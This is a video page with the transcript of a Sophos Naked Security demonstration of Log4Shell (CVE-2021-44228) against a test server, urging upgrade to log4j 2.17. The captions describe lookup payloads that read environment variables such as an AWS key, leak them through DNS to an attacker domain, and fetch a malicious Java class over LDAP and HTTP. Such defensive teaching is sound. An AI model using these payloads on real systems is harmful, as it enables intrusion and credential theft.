Log4Shell: The Movie... Why your sysadmins are working into the holidays

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
hello everybody i am paul ducklin from sophos naked security and my goal now is to convince you that if you have not yet upgraded to log 4j 2.7 or whatever the current version is at the time you see this video you really should so let's kick straight off what i'm going to do i want you to imagine that this server although it's got my face on it imagine this is your server you have a service on here that accepts requests from a web server maybe one of your web servers that allows people to put in phone numbers those phone numbers are uploaded to a server running on your service and logged using java log 4j so here's the synthetic program that i created whoops i'm in the wrong directory so let's just get there so let's run that up so what i'm going to do is i am going to run a service that is listening for requests from outside so this is you with the vulnerable server slash service this is me the bad guy on a server outside that will upload a phone number to you and somewhere inside your network you're going to collect that number it might be collected on a web server that doesn't use java that isn't vulnerable and it's going to be passed off somewhere in your network to a server that does have a vulnerable log for jay here's what can go wrong so just to show you what happens when i click the button uh i've sent the request to your server your server has processed it it's received a url which has the phone number it as a as a form submission as a get request it's extracted the phone number from it and the the synthetic logging that i'm doing here is i have called out to a vulnerable java program and it is using the log4j pro process or the log4j library here so the time that's inserted by log4j that's the function that was called i'm logging it as an error because they get logged by default that's the java class that was running and that is the message that i wanted to log could be out of memory could be network problems or it could be data that you want to log that came in from outside and in this case it's exactly the data you say here see here so let's try that again let's let's log something else so if i don't put in a phone number but i submit say hello fire up your the server on the vulnerable computer and you'll see once again the server accepts the connection the server isn't vulnerable but it's passed off to the logger and the logger returns the value that i put in so that all seems pretty innocent you're logging data from outside that's quite normal offer for auditing or for compliance reasons and you're logging external data now in this case it's a phone number it could be an http user agent string it could be a credit card number it could be an expiry date it could be a name it could be an address anything that you're logging that comes from outside can't be trusted and so logging text like hello seems innocent enough the problem is that log4j has a sort of meta language almost a programming language of its own that allows data in or allows text in the data to be logged to control or to reprogram the logger that sounds like a terribly bad idea and it turns out that it is for example if i pretend that my phone number is java colon uh let's put os squiggly brackets anything inside the dollar squiggly bracket squiggly bracket is essentially a meta command a program that when it's logged at the other end inside your network the log4j code will take that string and rewrite it so instead of logging exactly what you see there let's look at what happens so i'll submit that fire up the server and you should see that what happens in this case what's what gets logged is not the data that i put in there which was actually that funny looking string it was actually converted inside the server to a string of that sort now that seems perfectly innocent it seems bad enough to me because it means that you're not logging what the user actually submitted if that was your goal say for auditing purposes but at least it seems innocent that you've got a dud log entry that has some weird data where the external user decided what was going to be put in your log file and you couldn't control it now it gets slightly worse because the programming language if you like that log4j supports even lets you read in memory stuff like environment variables so if i put in nf and then i put say username which is an environment variable on windows that has the currently logged in user you can imagine on a server that would be the account that the server is using then when that gets logged you'll see that when the server accepts the data coming in from outside and chooses to log it then instead of logging what you see there end user name it's actually converted to a memory based server string again that may seem pretty innocent but it can get even worse because for example if you use amazon amazon web services you may have an environment variable in your system called something like that aws access key id so if i'm a malevolent user and i pretend to you that my phone number is that funny string and you happen to have one of those secret access keys in memory in the program environment on your server in memory so that you carefully don't write it to disk then what happens when i click ok and it reaches your computer this is a this is a fake one from amazon's website so don't panic is that you've now ended up logging something that was only supposed to be a memory so that's a sort of best of the worst but actually there's even more that you can do with this magic programming system if you put in a string that looks like this dollar squiggly brackets jindy colon and in this case i'm going to follow that with ldap it's a well-known directory protocol there are lots of different protocols supported um by this gindy system rmi dns and others there's a great article on sophos news that digs into the code to analyze the bugs if you're interested go and have a look at that whoops i want 8888 and then i'm going to put something like run there so here's another program that i can put so if i try and log a phone number that looks like this believe it or not what this instructs a vulnerable misconfigured system to do is it says to the other end the stuff that's in the dollar squiggly brackets this string here that i'm choosing because i'm outside i get to say to you look up that server name via dns so no tcp connections yet see if you can find that server by asking your corporate dns can you look this up and of course i control my.test so my dns server which we see over here is what's going to handle that request from your corporate network to try and locate this server in the first place and although your server may be blocked for making tcp connections it may be allowed to do dns lookups so you'll see that what will happen now is that it will try and look up that server if that server exists it will then instruct your server make a connection to tcp port 888 on it try and talk the ldap protocol and if you can tell it that you're interested in a thing called run so let's look what happens when we try and submit that here we go fire up the server accept the request you'll see that what we should be logging is indeed that little flash i put a little flash in my server so you can see when something interesting happens so we didn't get much activity it seems and it did actually log the string that i submitted as suspicious as it is but i from outside sending in that string did manage to force your server to do a dns lookup via your corporate network to my dns server so i now know you're at least partially vulnerable because i chose that name there and i can see that echoed in my dns data and that means i sent a request you logged it and while logging it you did the lookup so that's pretty bad so far in fact you can see that even if nothing else happens because there's no port 888 there's no ldap happening i as the controller of this dns server if i wanted imagine that instead of calling the server try me in my domain let's say that i said you know what use that aws access key pretend that's the server name instead and imagine that i said well what i want to do is i want to force you to look up a server called your accesskey.my.test what do you think will happen now well let's have a look when i click submit you'll see the request is processed the dns request goes out and indeed your server via your corporate network by doing nothing more than a dns lookup has just leaked in plain text probably onto the internet and to my malevolent dns server i've got a copy of your uh aws access key id which is very bad indeed but let's see if we can take it one step further the problem here is that there's nothing running on port 8888 but of course my.test that's my domain so i'm going to actually fire up a server here that is listening on port 8888 so i'm going to run an ldap server let's try one more time so here we go now i'm going to do the axis again let's let's just change this string so that it's uh obvious if we get something i pressed enter never mind let's not do that you'll see that now i actually did get two flashes of activity i got the dns lookup there it is a second time and then i did get the ldap lookup because i was busy listening and your server your vulnerable blog blog4j spoke to my old app server it said hello i'd like to log in and of course i'm the bad guy i said go on then you don't need a password to reach my server and in i came and you said i want an object called run which you see is the string i put there so that's a second thing that i've put into your network and has leaked out again that string matches the thing that you've looked for and what my server's done is say hey by the way i haven't got that object for you what you need to do is go and download it via http from this particular url here which of course i've said i want to put it on my server so let's try again and see what happens this time i'm going to run a web server on port 8887 so i've now got dns should see you coming then ldap should capture your request for whatever it is that i want you to get and my http server should actually say here is and i'm what i'm going to send you is a java class file in the hope that you'll run it so let's try that now uh if i just so if i just do this exactly again this time what i will do is i'm going to change that so we can see it more easily that can just be we'll call it hello this time so let's try that again uh your server is now listening i'm going to send in the request remember i'm outside so here we go in comes the request your logger processes it you get a dns lookup for the hello site that i wanted you got the ldap connection and again i said please redirect and you can see here you oblige when you redirected how my web server got your request now i don't have an i don't have a java class file uh for this run object so i just said that i was a teapot and gave you a 418 error and we didn't go any further i've still got the data leakage here i've still got the data leakage here but i haven't actually injected any code so let's try once more with this and this time what i'm going to do is i'm going to ask for an object via the ldap server but i know i do have a java program to send you and i could send you anything i could send you a key logger i said could send you a network sniffer a coin miner you name it what i'm going to do just to keep it simple and because this is a demonstration i'm going to try and pop a calculator so i'm going to send you a java program which is the compile the dot class form of this file all it does is say please run a calculator i only like the best sorts of calculators so it has to be an rpn one i'm not going to load regular calc on xc but if we see a calc pop up you will know that this has been voiced upon you from outside by my server over here in other words basically if this works because of the vulnerable log4j you've been pwned and remember that i'm popping a calculator but i'm doing it with java code that i chose i could put absolutely anything i want in there ransomware coin mining opening back doors in fact one of the coin miners we've already seen the crooks using it also opens up a root back door it drops a key for the crooks and it enables root login so that if you have ssh for your own administration they can actually log in as root to look after their coin miner and do whatever else they want so let's see if that's going to work so like i said this time i'm going to be asking for a uh something that i know i have the run this dot class the source code you saw i'll put in some spaces here so we can see that the new requests coming in if they do let's see what happens this time so now i'll click ok the service responded i've got the dns request followed by the ldap request that said where to go next this time followed by an http request that actually serves back the malicious class file and that program did indeed pop a calculator on your server this time it was only a calculator it could in theory have been almost anything running on the server inside the java process that's doing the logging with all the authority and network access that that java process has so it could download more malware if it wanted so hopefully that convinces you you really want to do something about this the good news is that the reason this has been working here is i have been using deliberately the old version of log4j so i set my java class path that's the environment variable is often set that you can also set it on the command line or in a configuration file for each application will have a class file set which says which add-ons do i want to use so you'll typically be saying well i'm using log4j and a load of other stuff and you'll say which versions you want to use now it just so happens that i have included here others other the more recent versions so i've got 2.17 and i've uh of the of the needed files if you have the real distribution has lots and lots of different jar files they'd all be in one directory so what i'm going to do is let me just actually change my class path for the next invocation of this and let's change that to be log 4j let's change it to 2.17 of the api one and 2.17 of callers are the two components i use more complicated logging might use more parts of the log4j toolkit the important thing is the 2.17.0 let us fire up that server again and although this is a sample size of one let's put in some spaces again what i'm going to do is i'm going to repeat exactly the same requests and you should see that with the patch in place the log happens did you see it was much quicker because it didn't have to go out and try and download a load of stuff there was no dns lookup there was no ldap request there was no http download so there was no data leaked there was no ldap connection and there was no al malware implant and i hope folks that that lets you know that really what you want is these log 4j 2.70 if you upgraded already to 2.15.0 don't panic there are a couple more bugs that were found in this and 2.15 was quickly followed by 2.16 quickly followed by 2.17 if you're halfway through upgrading to 2.15 don't go back to the beginning and start again with 2.17 finish the ones that aren't patched then go back and upgrade the 2.15 to 2.17 because as you can see anything you have that is below 2.15 could put you at serious risk via dns via a wide range of tcp protocols including ldap which is the one that all the cool kids seem to be using and then finally by an http download that could foist any malware the crooks want so thanks for listening everybody i hope you enjoyed this and until next time stay secure
Info
Channel: Naked Security
Views: 2,295
Rating: undefined out of 5
Keywords: cybsersecurity, CVE-2021-44228, hacking, Log4j
Id: jSs6bjmv6ak
Channel Id: undefined
Length: 18min 18sec (1098 seconds)
Published: Mon Dec 20 2021
Related Videos
The Art of Code - Dylan Beattie
NDC Conferences
3.4M
'Tesla as the World’s Biggest Robot Company:' Elon Musk on AI and U.S. Innovation | WSJ
Wall Street Journal
2.2M
How Crash Bandicoot Hacked The Original Playstation | War Stories | Ars Technica
Ars Technica
3.1M
How To Speak by Patrick Winston
MIT OpenCourseWare
5.3M
How does a USB keyboard work?
Ben Eater
1M
Ticket System + Transcripts | Discord.JS V13 Series | #20
Lyxcode
954
How to create Ultimate Excel Gantt Chart for Project Management (with Smart Dependency Engine)
The Office Lab
579K
How did the Enigma Machine work?
Jared Owen
999K
The Insane Engineering of James Webb Telescope
Real Engineering
838K
Live: Russian-Japan spacecraft lands after mission on the International Space Station
The Independent
2.9K
Special Lecture: F-22 Flight Controls
MIT OpenCourseWare
2.5M
LATE START! Home Automation Hangout 2021-12-19
SuperHouseTV
2.3K
Linux Interview Questions And Answers | Linux Administration Tutorial | Linux Training | Edureka
edureka!
628K
Building a DIY submarine
DIY Perks
2.3M
I Built This From A 1972 Popular Mechanics Magazine Plan. Does It Work?
Fireball Tool
2.4M
Beginner's Guide to the Bash Terminal
Joe Collins
1.8M
Kubernetes Crash Course for Absolute Beginners [NEW]
TechWorld with Nana
292K
Glitterbomb Trap Catches Phone Scammer (who gets arrested)
Mark Rober
52M
Why We Should NOT Look For Aliens - The Dark Forest
Kurzgesagt – In a Nutshell
6M
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.